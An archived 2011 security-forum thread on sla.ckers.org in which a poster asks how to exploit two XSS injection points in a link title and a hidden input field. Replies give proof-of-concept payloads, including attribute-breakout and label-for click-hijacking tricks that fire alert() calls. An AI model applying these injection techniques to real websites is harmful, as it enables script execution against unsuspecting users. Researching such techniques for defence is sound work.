Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Need help with some XSS
Posted by: choronzon
Date: April 14, 2011 04:26PM

Hello,
I need to exploit these XSS injections. Please consider that i need to execute js code under firefox (>3.6.x) . The following are the injection points:

1) <link rel="crap" type="application/rss+xml" title="INJECTION" href="...">

We can inject a new attribute:

<link rel="crap" type="application/rss+xml" title="aaa" newAttrib="" href="...">

Where aaa" newAttrib=" is the inject string in the above example.

2) <input type="hidden" name="xxx" value="INJECION" /> (we can still inject a new field)

Thanks!

Options: ReplyQuote
Re: Need help with some XSS
Posted by: Anonymous User
Date: April 14, 2011 07:03PM

Hmwell - FF...

This would work on Opera:
<input type="hidden" style="content:url(x);border:1000px solid red;" onmouseover=alert(1)//>

Options: ReplyQuote
Re: Need help with some XSS
Posted by: Gareth Heyes
Date: April 14, 2011 07:17PM

formaction="javascript:alert(1)" then when they submit the form it fires :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Need help with some XSS
Posted by: Anonymous User
Date: April 14, 2011 07:39PM

@Gareth Nope - that won't work:

<form action="x">
<input type="hidden" formaction="javascript:alert(1)">
<input type="submit">

The `formaction` can only decorate a <button> or an <input type=submit> - not arbitrary elements inside the form context. Or am I missing some trick? 8)

Options: ReplyQuote
Re: Need help with some XSS
Posted by: Gareth Heyes
Date: April 15, 2011 06:31AM

@Mario

Nope you're right my bad, hidden elements are disabled from focus events and formactions.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Need help with some XSS
Posted by: Skyphire
Date: April 15, 2011 06:56AM

Inject a label with HtmlFor controls:

"><label for="foo">

So you get:
<link rel="crap" type="application/rss+xml" title="aaa"><label for="foo">

Then any click anywhere in the document will activate the element with the id set to foo:

<input type="button" name="button" id="foo" value="submit" onclick="javascript:alert('a');return false;">

..etc.

Options: ReplyQuote
Re: Need help with some XSS
Posted by: Gareth Heyes
Date: April 15, 2011 07:38AM

@Skyphire

Nice trick :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote


Sorry, only registered users may post in this forum.